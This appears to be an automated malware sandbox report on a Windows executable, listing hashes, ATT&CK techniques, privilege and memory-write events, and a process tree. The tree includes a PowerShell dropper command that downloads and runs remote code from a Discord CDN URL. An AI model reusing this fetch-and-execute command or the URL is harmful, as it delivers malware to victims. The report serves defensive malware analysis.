5f830899b3b1cb680b762b896862e87fb11e68526fda9568d1e135160014413c

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
10-11-2024 21:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mixazed_20210808-075823.exe
Size

14KB
MD5

dfe4e4a9d0d02a17fd575b94291dfcfa
SHA1

4a8a44719272b2bd5b067f6b3439bb23f7ec15c6
SHA256

d693bdb8fc82b3385c47a02ef9ac465a2470c1f345a5f0b7dbd835c9c7b40115
SHA512

18b540a5a322350d63b5928debb80a30b2ab10419a87e11e9f6134584383ecc5a55131f5c2473c82a7686b5b52a46454b2ac62332f4cf946218071e7a784e8d7
SSDEEP

384:GEhQiqMOt/RzLo07xNqj/afC/ery7s62HG:iiqtt/Rzc07xEaBO7gHG

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://cdn.discordapp.com/attachments/873486687085428759/873677044964282429/main_module.txt-chimera-172013.bin

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
7	680	powershell.exe
8	680	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
680	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mixazed_20210808-075823.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
616	powershell.exe
2556	powershell.exe
2772	powershell.exe
2648	powershell.exe
1804	powershell.exe
680	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	616	powershell.exe
Token: SeIncreaseQuotaPrivilege	616	powershell.exe
Token: SeSecurityPrivilege	616	powershell.exe
Token: SeTakeOwnershipPrivilege	616	powershell.exe
Token: SeLoadDriverPrivilege	616	powershell.exe
Token: SeSystemProfilePrivilege	616	powershell.exe
Token: SeSystemtimePrivilege	616	powershell.exe
Token: SeProfSingleProcessPrivilege	616	powershell.exe
Token: SeIncBasePriorityPrivilege	616	powershell.exe
Token: SeCreatePagefilePrivilege	616	powershell.exe
Token: SeBackupPrivilege	616	powershell.exe
Token: SeRestorePrivilege	616	powershell.exe
Token: SeShutdownPrivilege	616	powershell.exe
Token: SeDebugPrivilege	616	powershell.exe
Token: SeSystemEnvironmentPrivilege	616	powershell.exe
Token: SeRemoteShutdownPrivilege	616	powershell.exe
Token: SeUndockPrivilege	616	powershell.exe
Token: SeManageVolumePrivilege	616	powershell.exe
Token: 33	616	powershell.exe
Token: 34	616	powershell.exe
Token: 35	616	powershell.exe
Token: SeDebugPrivilege	2556	powershell.exe
Token: SeIncreaseQuotaPrivilege	2556	powershell.exe
Token: SeSecurityPrivilege	2556	powershell.exe
Token: SeTakeOwnershipPrivilege	2556	powershell.exe
Token: SeLoadDriverPrivilege	2556	powershell.exe
Token: SeSystemProfilePrivilege	2556	powershell.exe
Token: SeSystemtimePrivilege	2556	powershell.exe
Token: SeProfSingleProcessPrivilege	2556	powershell.exe
Token: SeIncBasePriorityPrivilege	2556	powershell.exe
Token: SeCreatePagefilePrivilege	2556	powershell.exe
Token: SeBackupPrivilege	2556	powershell.exe
Token: SeRestorePrivilege	2556	powershell.exe
Token: SeShutdownPrivilege	2556	powershell.exe
Token: SeDebugPrivilege	2556	powershell.exe
Token: SeSystemEnvironmentPrivilege	2556	powershell.exe
Token: SeRemoteShutdownPrivilege	2556	powershell.exe
Token: SeUndockPrivilege	2556	powershell.exe
Token: SeManageVolumePrivilege	2556	powershell.exe
Token: 33	2556	powershell.exe
Token: 34	2556	powershell.exe
Token: 35	2556	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeIncreaseQuotaPrivilege	2772	powershell.exe
Token: SeSecurityPrivilege	2772	powershell.exe
Token: SeTakeOwnershipPrivilege	2772	powershell.exe
Token: SeLoadDriverPrivilege	2772	powershell.exe
Token: SeSystemProfilePrivilege	2772	powershell.exe
Token: SeSystemtimePrivilege	2772	powershell.exe
Token: SeProfSingleProcessPrivilege	2772	powershell.exe
Token: SeIncBasePriorityPrivilege	2772	powershell.exe
Token: SeCreatePagefilePrivilege	2772	powershell.exe
Token: SeBackupPrivilege	2772	powershell.exe
Token: SeRestorePrivilege	2772	powershell.exe
Token: SeShutdownPrivilege	2772	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeSystemEnvironmentPrivilege	2772	powershell.exe
Token: SeRemoteShutdownPrivilege	2772	powershell.exe
Token: SeUndockPrivilege	2772	powershell.exe
Token: SeManageVolumePrivilege	2772	powershell.exe
Token: 33	2772	powershell.exe
Token: 34	2772	powershell.exe
Token: 35	2772	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 2384 wrote to memory of 2504	2384	mixazed_20210808-075823.exe	31
PID 2384 wrote to memory of 2504	2384	mixazed_20210808-075823.exe	31
PID 2384 wrote to memory of 2504	2384	mixazed_20210808-075823.exe	31
PID 2384 wrote to memory of 2504	2384	mixazed_20210808-075823.exe	31
PID 2504 wrote to memory of 616	2504	cmd.exe	32
PID 2504 wrote to memory of 616	2504	cmd.exe	32
PID 2504 wrote to memory of 616	2504	cmd.exe	32
PID 2504 wrote to memory of 616	2504	cmd.exe	32
PID 2384 wrote to memory of 2756	2384	mixazed_20210808-075823.exe	34
PID 2384 wrote to memory of 2756	2384	mixazed_20210808-075823.exe	34
PID 2384 wrote to memory of 2756	2384	mixazed_20210808-075823.exe	34
PID 2384 wrote to memory of 2756	2384	mixazed_20210808-075823.exe	34
PID 2756 wrote to memory of 2556	2756	cmd.exe	35
PID 2756 wrote to memory of 2556	2756	cmd.exe	35
PID 2756 wrote to memory of 2556	2756	cmd.exe	35
PID 2756 wrote to memory of 2556	2756	cmd.exe	35
PID 2384 wrote to memory of 2736	2384	mixazed_20210808-075823.exe	37
PID 2384 wrote to memory of 2736	2384	mixazed_20210808-075823.exe	37
PID 2384 wrote to memory of 2736	2384	mixazed_20210808-075823.exe	37
PID 2384 wrote to memory of 2736	2384	mixazed_20210808-075823.exe	37
PID 2736 wrote to memory of 2772	2736	cmd.exe	38
PID 2736 wrote to memory of 2772	2736	cmd.exe	38
PID 2736 wrote to memory of 2772	2736	cmd.exe	38
PID 2736 wrote to memory of 2772	2736	cmd.exe	38
PID 2384 wrote to memory of 2496	2384	mixazed_20210808-075823.exe	39
PID 2384 wrote to memory of 2496	2384	mixazed_20210808-075823.exe	39
PID 2384 wrote to memory of 2496	2384	mixazed_20210808-075823.exe	39
PID 2384 wrote to memory of 2496	2384	mixazed_20210808-075823.exe	39
PID 2496 wrote to memory of 2648	2496	cmd.exe	40
PID 2496 wrote to memory of 2648	2496	cmd.exe	40
PID 2496 wrote to memory of 2648	2496	cmd.exe	40
PID 2496 wrote to memory of 2648	2496	cmd.exe	40
PID 2384 wrote to memory of 1724	2384	mixazed_20210808-075823.exe	41
PID 2384 wrote to memory of 1724	2384	mixazed_20210808-075823.exe	41
PID 2384 wrote to memory of 1724	2384	mixazed_20210808-075823.exe	41
PID 2384 wrote to memory of 1724	2384	mixazed_20210808-075823.exe	41
PID 1724 wrote to memory of 1804	1724	cmd.exe	42
PID 1724 wrote to memory of 1804	1724	cmd.exe	42
PID 1724 wrote to memory of 1804	1724	cmd.exe	42
PID 1724 wrote to memory of 1804	1724	cmd.exe	42
PID 2384 wrote to memory of 2032	2384	mixazed_20210808-075823.exe	43
PID 2384 wrote to memory of 2032	2384	mixazed_20210808-075823.exe	43
PID 2384 wrote to memory of 2032	2384	mixazed_20210808-075823.exe	43
PID 2384 wrote to memory of 2032	2384	mixazed_20210808-075823.exe	43
PID 2032 wrote to memory of 680	2032	cmd.exe	44
PID 2032 wrote to memory of 680	2032	cmd.exe	44
PID 2032 wrote to memory of 680	2032	cmd.exe	44
PID 2032 wrote to memory of 680	2032	cmd.exe	44

C:\Users\Admin\AppData\Local\Temp\mixazed_20210808-075823.exe
"C:\Users\Admin\AppData\Local\Temp\mixazed_20210808-075823.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2384
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2504
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2496
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1724
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).DownloadString('https://cdn.discordapp.com/attachments/873486687085428759/873677044964282429/main_module.txt-chimera-172013.bin')
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2032
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).DownloadString('https://cdn.discordapp.com/attachments/873486687085428759/873677044964282429/main_module.txt-chimera-172013.bin')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
23e6da64dfdf3befb9752373d1bf8d08

SHA1
360069f2bf6eac7a223614e6244fe367c75e9755

SHA256
a4c6495e6321263033adcedd2e0218c35c03bdb9ebfd94af6d33a03ca212da0a

SHA512
0f68e1ef8879a57545bbc5f6be172a3c0945c2b813eb50ac31d6ae2ccfd4512a504a9e5329da3e1ce4ca48a253ab63449b8e9fec249ab2f9ac6fd5210e9155d8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
f8f5ecd678fe0e0e5cba19ec7b8d929a

SHA1
01da52a59c81992db044dbd9ae4372fcdf93cfeb

SHA256
328a582d5aa72eb6aa6e17696bc831a54efc7e557a01ec1642b71cbe773593a8

SHA512
5d520c50422930c72758a7e553f6249e730610da929a4f23dac9cba97805f9eb4f521653403f532d826e55c31c40f352594451d2be94cf35e72ea179507938d0

Download Submit
memory/616-2-0x0000000073061000-0x0000000073062000-memory.dmp

Filesize
4KB

Download
memory/616-3-0x0000000073060000-0x000000007360B000-memory.dmp

Filesize
5.7MB

Download
memory/616-4-0x0000000073060000-0x000000007360B000-memory.dmp

Filesize
5.7MB

Download
memory/616-5-0x0000000073060000-0x000000007360B000-memory.dmp

Filesize
5.7MB

Download
memory/616-6-0x0000000073060000-0x000000007360B000-memory.dmp

Filesize
5.7MB

Download
memory/616-7-0x0000000073060000-0x000000007360B000-memory.dmp

Filesize
5.7MB

Download